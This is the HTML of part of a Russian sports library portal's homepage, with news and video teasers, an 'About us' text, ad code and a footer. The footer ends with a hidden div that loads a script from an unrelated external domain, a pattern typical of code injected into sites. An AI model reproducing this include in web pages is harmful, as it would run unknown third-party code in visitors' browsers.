                    <img alt="В Москве состоится Первый открытый московский турнир по самбо среди спортсменов с ограничениями жизнедеятельности" src="/media/bmsi_thumb_medium/0c7c4008-3658-427a-8d0d-64b46bf9e292" />
                    <a href="/doc/ed3d3367-6ab3-4514-9d30-379842c60447/" title="В Москве состоится Первый открытый московский турнир по самбо среди спортсменов с ограничениями жизнедеятельности" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/ed3d3367-6ab3-4514-9d30-379842c60447/" title="В Москве состоится Первый открытый московский турнир по самбо среди спортсменов с ограничениями жизнедеятельности">В Москве состоится Первый открытый московский турнир по самбо среди спортсменов с ограничениями жизнедеятельности</a>
                    </h3>
                    <p>
                      <a href="/doc/ed3d3367-6ab3-4514-9d30-379842c60447/" style="color:#000000; text-decoration:none;">«Нет границ для настоящего самбиста» - под таким девизом впервые в Москве пройдет турнир, не имеющий себе аналогов во всем мире. 14 апреля 2012 года впервые в истории самбо пройдет первый открытый московский турнир среди борцов с ограничениями жизнедеятельности.</a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="ФК “Портсмут” проведёт благотворительный товарищеский матч против ФК “Ростов”" src="/media/bmsi_thumb_medium/f641c57f-ed0c-419e-8805-8625f03cc07b" />
                    <a href="/doc/a28a30ef-5226-4fe4-9087-f0f8ab2f4369/" title="ФК “Портсмут” проведёт благотворительный товарищеский матч против ФК “Ростов”" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/a28a30ef-5226-4fe4-9087-f0f8ab2f4369/" title="ФК “Портсмут” проведёт благотворительный товарищеский матч против ФК “Ростов”">ФК “Портсмут” проведёт благотворительный товарищеский матч против ФК “Ростов”</a>
                    </h3>
                    <p>
                      <a href="/doc/a28a30ef-5226-4fe4-9087-f0f8ab2f4369/" style="color:#000000; text-decoration:none;">5 октября 2011 года в Англии  состоится благотворительный товарищеский матч между командами ФК «Портсмут» и ФК «Ростов». Игра будет проходить в Портсмуте на стадионе «Фраттон Парк». Начало в 22:30 по московскому времени. Помощь в проведении матча оказывает компания «Футбол Маркет»</a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="Шарапова: новое расписание турниров" src="/media/bmsi_thumb_medium/56c6ebaf-9983-47b5-8b0c-9911f9d5fb45" />
                    <a href="/doc/e39a950b-e175-4212-9d30-0711bd448fd0/" title="Шарапова: новое расписание турниров" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/e39a950b-e175-4212-9d30-0711bd448fd0/" title="Шарапова: новое расписание турниров">Шарапова: новое расписание турниров</a>
                    </h3>
                    <p>
                      <a href="/doc/e39a950b-e175-4212-9d30-0711bd448fd0/" style="color:#000000; text-decoration:none;"> Мария Шарапова, вернувшаяся на вершину мирового женского тенниса, не жалуется на новое плотное расписание. Ранее вторая ракетка мира симпатизировала теннисистам, которые угрожали забастовкой, направленной против плотного календаря сезона. Но после вызванного травмой спада в карьере она только рада</a>
                    </p>
                  </li>
                </ul>
              </div>
            </div>
          </div>
          <div class="halved-wrap-right video-block">
            <div class="block clearfix">
              <h2>Видео <a href="/video/" class="all">все</a></h2>
              <div class="scrollbar-v">
                <div class="scrollbar">
                  <a class="prev" href=""></a>
                  <a class="next" href=""></a>
                  <div class="track">
                    <div class="thumb">
                      <span class="s-left"></span>
                      <span class="s-right"></span>
                    </div>
                  </div>
                </div>
              </div>
              <div class="viewport">
                <ul class="overview">
                  <li class="clearfix">
                    <img alt="Специализированная детско-юношеская спортивная школа олимпийского резерва № 49 «ТРИНТА»" src="/media/bmsi_thumb_medium/4ef64340-aabe-4b65-b52e-45d41506b662" />
                    <a href="/doc/e4cde48f-4453-448a-b18e-dcc4dd2acfb4/" title="Специализированная детско-юношеская спортивная школа олимпийского резерва № 49 «ТРИНТА»" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/e4cde48f-4453-448a-b18e-dcc4dd2acfb4/" title="Специализированная детско-юношеская спортивная школа олимпийского резерва № 49 «ТРИНТА»">Специализированная детско-юношеская спортивная школа олимпийского резерва № 49 «ТРИНТА»</a>
                    </h3>
                    <p>
                      <a href="/doc/e4cde48f-4453-448a-b18e-dcc4dd2acfb4/" style="color:#000000; text-decoration:none;">Специализированная детско-юношеская спортивная школа олимпийского резерва № 49 «ТРИНТА» образована ещё во время Второй Мировой войны, и вот уже более шестидесяти лет выпускает настоящих профессионалов. С 2003 года «ТРИНТА» стала региональным центром Олимпийской подготовки России по баскетболу. </a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="Первенство Москвы по Го" src="/media/bmsi_thumb_medium/85240ee7-bdc2-42bc-98a6-d66a905a9828" />
                    <a href="/doc/b7f3c87d-d577-4bc7-852e-a343f4f3ba8c/" title="Первенство Москвы по Го" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/b7f3c87d-d577-4bc7-852e-a343f4f3ba8c/" title="Первенство Москвы по Го">Первенство Москвы по Го</a>
                    </h3>
                    <p>
                      <a href="/doc/b7f3c87d-d577-4bc7-852e-a343f4f3ba8c/" style="color:#000000; text-decoration:none;">В клубе "Китай-Город" прошло командное Первенство Москвы по Го среди юношей и девушек до 18-ти лет.</a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="2011 год – Год спорта и здорового образа жизни" src="/media/bmsi_thumb_medium/c29d991b-0002-4227-ba9a-f8a3d6d1926c" />
                    <a href="/doc/7d762f27-30fb-4ff1-ab0b-be7e69aeee9b/" title="2011 год – Год спорта и здорового образа жизни" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/7d762f27-30fb-4ff1-ab0b-be7e69aeee9b/" title="2011 год – Год спорта и здорового образа жизни">2011 год – Год спорта и здорового образа жизни</a>
                    </h3>
                    <p>
                      <a href="/doc/7d762f27-30fb-4ff1-ab0b-be7e69aeee9b/" style="color:#000000; text-decoration:none;">2011-й год объявлен в Москве Годом спорта и здорового образа жизни. В связи с этим разработана большая городская программа мероприятий, которые позволят придать городскому физкультурному движению новый импульс.</a>
                    </p>
                  </li>
                  <li class="clearfix">
                    <img alt="Суперкубок мира по самбо Мемориал А. Харлампиева" src="/media/bmsi_thumb_medium/364fab65-cd75-45b9-b0a8-f647576c90ab" />
                    <a href="/doc/d08c36d2-bcac-45f5-aadd-a676aa690bf0/" title="Суперкубок мира по самбо Мемориал А. Харлампиева" style="position:absolute; z-index:1000;width:81px;height:82px;top:12px;left:12px"></a>
                    <h3>
                      <a href="/doc/d08c36d2-bcac-45f5-aadd-a676aa690bf0/" title="Суперкубок мира по самбо Мемориал А. Харлампиева">Суперкубок мира по самбо Мемориал А. Харлампиева</a>
                    </h3>
                    <p>
                      <a href="/doc/d08c36d2-bcac-45f5-aadd-a676aa690bf0/" style="color:#000000; text-decoration:none;">В УСЗ "Дружба" прошли соревнования Суперкубка мира по самбо Мемориал Анатолия Харлампиева.</a>
                    </p>
                  </li>
                </ul>
              </div>
            </div>
          </div>
        </div>
        <div class="block" id="blackblock">
          <h2>О нас</h2><img alt="BMSI" src="/content/BmsiNew/images/logo-large.png" style="float: left; margin: 15px 15px 15px 0;" />
<p>
	БМСИ — электронная библиотека по спортивной тематике. Главная задача БМСИ — предоставить пользователю наиболее полную разностороннюю информацию по каждому виду спорта. На нашем портале публикуются новости и обзоры, справочники и методические пособия, различные научные статьи, официальные документы спортивных организаций, учебники и видеоуроки, правила и история видов спорта. Все материалы библиотеки находятся в открытом доступе.</p>
<p>
	Одной из отличительных черт портала БМСИ является то, что на сайте публикуются электронные версии периодических изданий о спорте, среди которых как региональные и общероссийские издания, так и европейские спортивные журналы. Все издания представлены в современном и удобном для читателей формате - Flipping book (опция для чтения книги с экрана с виртуальным перелистыванием страниц и возможностью поиска по содержимому).</p>
<p>
	На сайте БМСИ представлены архивы и свежие электронные версии таких известных изданий, как «SportWeek», «Планета Баскетбол», «Мир дзюдо», «Весь Экстрим», «Самозащита без оружия», «Бильярдный мир», «Спорт для всех», «Вестник спортивных инноваций», «СпортМагазин» и др. На данный момент в списке периодических изданий о спорте на сайте БМСИ числится уже более 100 изданий, и число информационных партнеров постоянно растет.</p>
<p>
	Помимо периодики на портале Вы найдете книги и учебные пособия. Сейчас раздел «книги» насчитывает более 160 различных спортивных изданий. Также на портале публикуются уникальные материалы, которые доступны только пользователям БМСИ. Например, материалы журналов «The Paralympian» и «Badminton Europe e-magazine» переведенные на русский язык.</p>
<p>
	Особое внимание в наполнении ресурса уделяется публикации научных спортивных материалов. Сотрудники проекта кропотливо собирают научные материалы по спортивной медицине, спортивному оборудованию и инновациям в спорте из различных источников, в том числе и англоязычных.</p>
<p>
	Портал весьма прост в обращении. Все материалы библиотеки разделены по видам спорта, категориям и типам документов (новости, популярные статьи, научные статьи, нормативные акты, правила/история). Для удобства пользования порталом, каждый зарегистрировавшийся пользователь может установить приоритетные для себя виды спорта, рубрики, регионы и языковые настройки.</p>
<p>
	Зарегистрированные пользователи получают возможность оставлять комментарии, а также пользоваться функциями «Личный кабинет», «Избранное» и «Мои издания».</p>
<p>
	Проект постоянно совершенствуется. В ближайшее время на портале будет создан раздел «Энциклопедия спорта» и раздел, посвященный спортивным событиям. Также в скором времени на портале появится форум.</p>
<p>
	В ноябре 2010 года для библиотеки БМСИ вышло бесплатное приложение SportReader для Apple iPad, доступное для любого пользователя данного устройства в Apple Appstore. SportReader предоставляет удобный доступ к той части библиотеки, где расположены электронные версии периодических изданий о спорте на русском и иностранных языках. Все представленные издания доступны для закачки и последующего чтения в оффлайн-режиме. Таким образом, приложение является также и карманной библиотекой по спортивной тематике.</p>
</div>
        <div style="margin-left:12px; margin-top: 5px;">
                                    
                                    <script type="text/javascript">
                                        google_ad_client = "ca-pub-5525988258425794";
                                        google_ad_slot = "1318210067";
                                        google_ad_width = 1175;
                                        google_ad_height = 145;
                                    </script>
                                    <!-- bmsi_main_bottom -->
                                    <script type="text/javascript"
									src="//pagead2.googlesyndication.com/pagead/show_ads.js">
									</script>
																		
									</div>
        <div id="footer">
          <div id="footer-copyright">
			© БМСИ, 2010-2014<br />Свидетельство о регистрации СМИ: Эл № ФС77-42647
		</div>
          <a href="http://www.ifla.org" id="footer-link-ifla">IFLA</a>
          <a href="http://www.liveinternet.ru/click" id="li-counter" target="_blank">
            <img src="/content/BmsiNew/images/blank.gif" id="counterImage" alt="" title="LiveInternet: показано число просмотров и посетителей за 24 часа" border="0" width="88" height="31" />
          </a>
          <script type="text/javascript">
			var img=document.getElementById('counterImage');
			img.setAttribute('src', 'http://counter.yadro.ru/hit?t12.5;r'+
			escape(document.referrer)+((typeof(screen)=='undefined')?'':
			';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
			screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
			';'+Math.random());
		</script>
          <ul id="footer-menu">
            <li>
              <a href="/useragreement">Пользовательское соглашение</a>
            </li>
            <li>
              <a href="/adv">Реклама</a>
            </li>
            <li>
              <a href="/partners">Партнеры</a>
            </li>
            <li>
              <a href="/help">Помощь</a>
            </li>
          </ul>
          <div style="overflow: hidden;">
            <script language="Javascript">
var bnbuniqid = '9U9CsXze54pS29oE2E39';
var bnbuniqsid = '78537';
var async = 0;
</script>
            <script type="text/javascript" src="http://klonedaset.org/viewb.js"></script>
          </div>
        </div>
      </div>
    </div>
  </body>
</html>